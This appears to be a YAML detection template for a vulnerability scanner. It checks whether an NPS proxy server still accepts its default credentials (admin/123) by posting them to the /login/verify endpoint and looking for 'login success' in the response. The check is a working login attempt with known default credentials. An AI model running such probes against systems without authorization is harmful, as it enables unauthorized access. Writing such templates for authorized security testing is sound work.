product: NPS
vName: NPS 默认密码
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: true
      path: /login/verify
      header:
        Content-Type: application/x-www-form-urlencoded
      data: username=admin&password=123
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - login success
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and